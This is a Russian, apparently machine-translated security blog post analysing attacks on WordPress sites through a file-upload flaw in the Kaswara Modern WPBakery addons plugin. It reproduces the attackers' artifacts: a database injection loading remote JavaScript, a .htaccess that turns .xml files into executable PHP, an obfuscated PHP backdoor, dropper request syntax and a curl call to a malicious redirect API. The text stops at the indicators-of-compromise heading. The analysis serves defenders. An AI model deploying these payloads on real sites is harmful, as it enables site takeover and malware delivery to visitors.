Уязвимый плагин Kaswara Modern WPBakery Page Builder Addons эксплуатируется в дикой природе

Еще 20 апреля 2021 года наши друзья из WPScan сообщили о серьезной уязвимости в надстройках Kaswara Modern VC, также известных как надстройки Kaswara Modern WPBakery Page Builder. Он больше не доступен на Codecanyon/Envato, а это означает, что если он у вас запущен, вы должны выбрать альтернативу.

Эта уязвимость позволяет неавторизованным пользователям загружать произвольные файлы в каталог значков плагина (./wp-content/uploads/kaswara/icons). Это первый индикатор компрометации (IOC), которым наши друзья из WPScan поделились с нами в своем отчете.

Возможность загружать произвольные файлы на веб-сайт дает злоумышленнику полный контроль над сайтом, что затрудняет определение конечной полезной нагрузки этой инфекции; таким образом, мы покажем вам все, что мы нашли до сих пор (мы немного увлеклись исследованием, поэтому не стесняйтесь переходить к разделу IOC, если вы не хотите читать).

Внедрение базы данных, поддельные приложения для Android и другие бэкдоры

Спасибо нашему другу Денису Синегубко из Sucuri за указание на последующую инъекцию базы данных, используемую в этой атаке.

Злоумышленники будут обновлять параметр «kaswara-customJS», чтобы добавить произвольный вредоносный фрагмент кода Javascript. Вот один пример, который мы нашли:

INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES (1856,'kaswara-customJS',
'dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoXCdzY3JpcHRcJyk7CnNjcmlwdC5vbmxvYWQgPSBm
dW5jdGlvbigpIHsKfTsKc2NyaXB0LnNyYyA9IFwiaHR0cHM6Ly9ldmFkYXYubGluay9zY3JpcHQuanNcIjsKZG9jdW1lbnQu
Z2V0RWxlbWVudHNCeVRhZ05hbWUoXCdoZWFkXCcpWzBdLmFwcGVuZENoaWxkKHNjcmlwdCk7','yes');

Эта строка в кодировке base64 переводится как:

var script = document.createElement(\'script\');
script.onload = function() {
};
script.src = \"hxxps://evadav[.]link/script.js\";
document.getElementsByTagName(\'head\')[0].appendChild(script);

И, как обычно бывает с этим типом скрипта, он будет последовательно загружать ряд других фрагментов кода Javascript, а конечная полезная нагрузка будет либо вредоносной рекламой, либо набором эксплойтов. Это очень похоже на то, что Wordfence сообщил здесь.

В этом случае скрипт умирает на hxxp://double-clickd[.]com/ и не загружает плохой контент. Я обнаружил подозрительный Javascript, вызывающий этот сайт с начала 2020 года, и люди уже блокируют его с 2018 года.

Поддельные приложения, загруженные на сайт

40 приложений для Android, обнаруженных на изученных нами веб-сайтах, были поддельными версиями различных приложений, таких как AliPay, PayPal, Correos, DHL и многих других, которые, согласно анализу VirusTotal, были обнаружены самыми популярными антивирусными поставщиками.

Я не проверял намерения приложения, но краткий обзор запрашиваемых разрешений может дать нам представление о том, что оно может сделать:

• android.permission.WRITE_SMS
• android.permission.RECEIVE_SMS
• android.permission.FOREGROUND_SERVICE
• android.permission.KILL_BACKGROUND_PROCESSES
• android.permission.READ_CONTACTS
• android.permission.READ_PHONE_STATE
• android.permission.READ_SMS
• android.permission.ACCESS_NETWORK_STATE
• android.permission.QUERY_ALL_PACKAGES
• android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
• android.permission.ИНТЕРНЕТ
• android.permission.SEND_SMS
• android.permission.CALL_PHONE
• android.permission.WAKE_LOCK
• android.permission.REQUEST_DELETE_PACKAGES

Однако эти файлы не загружаются немедленно с помощью эксплойта Kaswara. После того, как сайт будет скомпрометирован, злоумышленники сначала загрузят другие инструменты, чтобы полностью контролировать сайт.

Загруженные файлы

Некоторые бэкдоры и другое вредоносное ПО также были обнаружены на сайтах, скомпрометированных этой уязвимостью. В этом посте я поделюсь кратким анализом самых популярных и интересных из них. Однако сначала я хочу остановиться на самом сложном.

Перенаправление и поддельные приложения

Поддельные приложения, которые я обнаружил на нескольких взломанных сайтах, не были загружены с использованием уязвимости Kaswara. Они загружаются на сайт с помощью многофункционального хакерского инструмента, который позволяет злоумышленнику загрузить некоторый удаленный код (предоставив URL-адрес или строку) и перенаправить пользователя на вредоносный сайт.

Файл можно легко идентифицировать по наличию этой строки: base64_decode('MTIz');error_reporting(0); функция

Интересно, что он рандомизирует все остальное, кроме этого.

Вредоносное ПО находится в одной строке, что также является интересным IOC, если вы ищете этот тип аномалии кода.

Чтобы было легче понять, я расшифровал большую часть кода, переименовал интересные функции и украсил код. Зловред включает в себя 6 различных функций, 5 из которых основаны на значениях, передаваемых в переменной $_GET['ts'] . Для этого документа давайте рассмотрим один из множества найденных мной экземпляров: c.php .

/c.php?ts=кт

Это ничего не делает и заставит сайт возвращать ошибку 500 (позже в коде).

/c.php?ts=1

Изменяет значение флага $q1a на true, чтобы выполнить проверку кода и вывести атакующему сообщение OK.

В этом случае удаленный сайт отвечает: {"body":"","headers":["Location: http:\/\/good-valid-1"],"status":302,"contentType":""}

/c.php?ts=sv&v="Код"&p=40bd001563085fc35165329ea1ff5c5ecbdbbeef

Записывает на сервер файл с кодом, предоставленным содержимым $_GET["v"] до тех пор, пока $_GET["p"] является контрольной суммой SHA1, равной 123 (помните тот первый IOC base64_decode('MTIz') ? это это контрольная сумма).

/c.php?ts=тт

Записывает 5 МБ «-» на сервер, вероятно, используется для проверки, будет ли функция загрузки работать на сервере.

/c.php?ts=dwm&h=ХЭШ1,ХЭШ2

Когда вредоносная программа получает этот запрос, она выполняет тест, чтобы убедиться, что загруженные файлы были успешно записаны на сервер. Их хэши MD5 должны быть известны и отправляются в переменную $_GET['h'] в виде значений, разделенных запятыми.

/c.php?ts=dw&h=hash&l=URLs_as_CSV

Загружает файл с ряда сторонних веб-сайтов и сохраняет его на сервере, называя его после последних 12 символов md5 загруженного файла.

Эта функция используется для загрузки поддельных приложений на сервер.

Вот пример запроса на загрузку вредоносных файлов /c.php?ts=dw&h=7e7bcc10406f3787b0a08d4199e6a697&l=http%3A%2F%2Fsmurfetta.ru%2Fhash-de%2F%3Fh%3D7e7bcc10406f3787b0a08d4199e6a697

Перенаправление доступа

Если была выбрана опция kt или не выбрана никакая опция, код переходит к перенаправлению, которое достигается путем запроса большого двоичного объекта JSON с необходимыми данными. Затем он перенаправляет посетителя, используя функцию заголовка.

Ответ выглядит следующим образом: {"body":"","headers":["Location: https:\/\/stunningawards.life\/?u=yuek60p&o=2k5p1e0&m=1"],"status":302,"contentType":""}

Функция для выполнения запроса cURL с необходимыми параметрами такова: Ничего особенного…

И это можно перевести в этот запрос cURL:

curl -X POST hxxp://papass[.]ru/click_api/v3 \
    -H 'X-Forwarded-For: 200.171.221.1' \
    -H 'Accept-Language: *' \
    -H 'User-Agent: Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/14.0 Chrome/87.0.4280.141 Mobile Safari/537.36' \
    -d 'token=hmfovdqs9vfxp8s4rwqzxbfz6c43bwgb&force_redirect_offer=1&sub_id_1=dbhomeworkout.com&sub_id_2=dbhomeworkout.com&sub_id_3=dbhomeworkout.com&sub_id_4'

Конечный URL, насколько я мог проверить, является случайным, но имеет ту же характеристику, что и поддельная страница для популярного сервиса или приложения.

wp-content/uploads/kaswara/icons/16/javas.xml и wp-content/uploads/kaswara/icons/16/.htaccess

XML-файл обычно не помечается как потенциальная угроза, но в этом случае у нас есть специально созданный файл .htaccess, который меняет то, как его видит веб-сервер:

Order Deny,Allow
Allow from all

<FilesMatch "_?(javas|homes|menus)\.(php|xml|pdf)\d*$">
    AddHandler application/x-httpd-php .xml .pdf
    AddType application/x-httpd-php .xml .pdf
    # ---
    SetHandler application/x-httpd-php
    ForceType application/x-httpd-php
    # ---
    php_value engine 1
    # ---
    Order Deny,Allow
    Allow from all
</FilesMatch>

Фактически, он говорит Apache понимать любые файлы java, home или меню с xml, php или pdf как файл PHP для соответствующей обработки и выполнения. Таким образом, любой из этих файлов, находящихся в той же структуре каталогов, что и этот .htaccess, будет подозрительным.

Файл javas.xml такой же, как и некоторые другие вредоносные файлы, загруженные на сайт. Я обнаружил, что разница в том, что у некоторых есть одна или две пустые строки в конце файла, что делает традиционное хеширование немного сложнее.

<?php
$LnWYZK 	  	="\163"."\164" 	 ."\162\137\162\157"	 	.	 	"\164"	. 		  (		 279	 	-  			266)	 	  ; 	 	 if( !empty		 	 (	$ { 	 $LnWYZK	   	
("\137"	.	"\103\102\106" 		 	.		 "\107")}	) 	 		)  			{  	 			 $nNZph 	 =$LnWYZK		 (	 		 "\172". 		"\161". 	(4334	 	
-4329	)		   	 	)			  ; $ouQLkV  	 	= $LnWYZK		 (	 	 	"\157\156"  	.  	"\146" .		 "\162"	.		  	 (	  9680	 	-	  9616)  	 . "\137" 		
. 		"\161"   		.   		"\162\160\142\161\162" 	 ) 		  ; 			  $VNfzSD  	 	=$LnWYZK("\160\145\162"."\156\147\162\137\163\150\141\160"	
. "\147\166\142\141" 			 ); 	  	foreach	($			  { 	 	 $LnWYZK(			  "\137".	 	"\103"  	.	  		"\102" . 			 "\106"	 	. 		"\107" 	 		
)  			}	  as	$IKRDzf   		=>	$NIvHUr	  )( 	  	$nNZph  			(	   	$IKRDzf  	)  	===	 	  		 "c"	  .  (2668 - 	  	2626	 		 )   			.   		
"\145\141"   		."\71"		   .  			"\67"	."\71\145\144"	 	.	  "\71\70\62"	.  	"\143\60" 	 . 	 	 	(314406	  -51163		 )	 	 	. "\60" 			 
.	"\145" 	 . 			 "\71" 	 .		   "\145" . "\71"	  		.	"\70"	  	 .			  "\141"	  		.	 	"\66" . 		"\66"	.	"\144"		  	.    		( 	  	9786	-		 	 
9780 		) 		  		 	&&  	$QZCMY	 		 =	 	  $VNfzSD( ""  			, 	 $ouQLkV (  	$NIvHUr)   		)  	) 		 		 	 	?$QZCMY 	 () : " 		"		  	
;  	}

Вредоносный код запутывается с помощью строк в кодировке str_rot13 и base64. Он также использует шестнадцатеричные значения и математические операции, чтобы немного скрыть строки. Окончательная полезная нагрузка неизвестна, поскольку она создаст функцию на основе значений запроса POST. Однако полезная нагрузка кажется одинаковой каждый раз, поскольку она полагается на проверку md5 перед ее созданием (c42ea979ed982c02632430e9e98a66d6 — это хэш md5).

Вывод

Поскольку это активная кампания, на момент написания этого поста мы обнаруживаем все больше и больше различных примеров вредоносного ПО, попадающих на затронутые сайты. Некоторые из них являются просто вариациями того, что мы здесь имеем, в то время как другие достаточно интересны для более глубокого анализа. Ищите небольшие сообщения, которые скоро появятся, чтобы изучить некоторые из этих других примеров.

Это иллюстрирует важность обновления ваших расширений последними исправлениями безопасности; если разработчики не выпускают исправления своевременно или он удаляется из репозитория WordPress.org (или других торговых площадок), мы настоятельно рекомендуем вам найти ему более безопасную альтернативу.

Если вас беспокоят вредоносные программы и уязвимости вашего сайта, ознакомьтесь с функциями безопасности Jetpack. Jetpack Security обеспечивает простую в использовании комплексную защиту сайта WordPress, включая резервное копирование, сканирование на наличие вредоносных программ и защиту от спама.

Индикаторы компрометации

Здесь вы найдете полный список всех IOC, которые мы определили: